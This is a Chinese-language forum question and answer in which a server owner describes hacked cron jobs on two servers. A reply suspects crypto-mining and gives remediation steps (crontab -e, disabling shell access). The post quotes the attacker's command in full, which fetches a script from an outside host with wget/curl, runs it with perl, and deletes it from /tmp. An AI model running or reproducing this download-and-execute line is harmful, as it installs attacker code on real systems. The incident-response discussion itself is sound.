我有兩台專用伺服器,幾天前開始向我發送有關正在運行的未知 cron 作業的通知。
在兩台伺服器上,我的網站都有輔助帳戶,並且駭客修改了這些帳戶的 cron 作業,而不是 root 的。所以我認為“也許”他們的訪問權限有限。
兩者都嘗試執行以下命令: cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;curl-Ohttp://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
第一台伺服器的 Cronjob 輸出:
http://pastebin.com/m56ga6pp
第二台伺服器的 Cronjob 輸出:
http://pastebin.com/4utZ8agC
奇怪的是,兩台伺服器似乎同時被駭客入侵,並且使用的是相同的方法。
有沒有人有這樣的黑客,可以給我關於他是如何進入的以及我是否可以在不重新安裝的情況下刪除它的想法......?
伺服器上有很多網站,第一個網站佔用了大約 500GB 的空間,如果要移動到其他地方並重新安裝,需要花費大量的時間。
先致謝!
答案1
從 Pastebin 輸出來看,cron 作業似乎正在嘗試產生雜湊值,我懷疑這個人正在嘗試將伺服器用作加密貨幣礦池的一部分。
有關他如何進入的詳細信息,我們需要各種日誌,您是否 100% 確定這不是網站所有者幹的?您可以輕鬆刪除 cronjob。
crontab -e
為了防止該人重新進入,如果沒有理由讓特定使用者擁有 shell 存取權限,我將停用該使用者的 shell 存取權限。
chsh -s /sbin/nologin {username}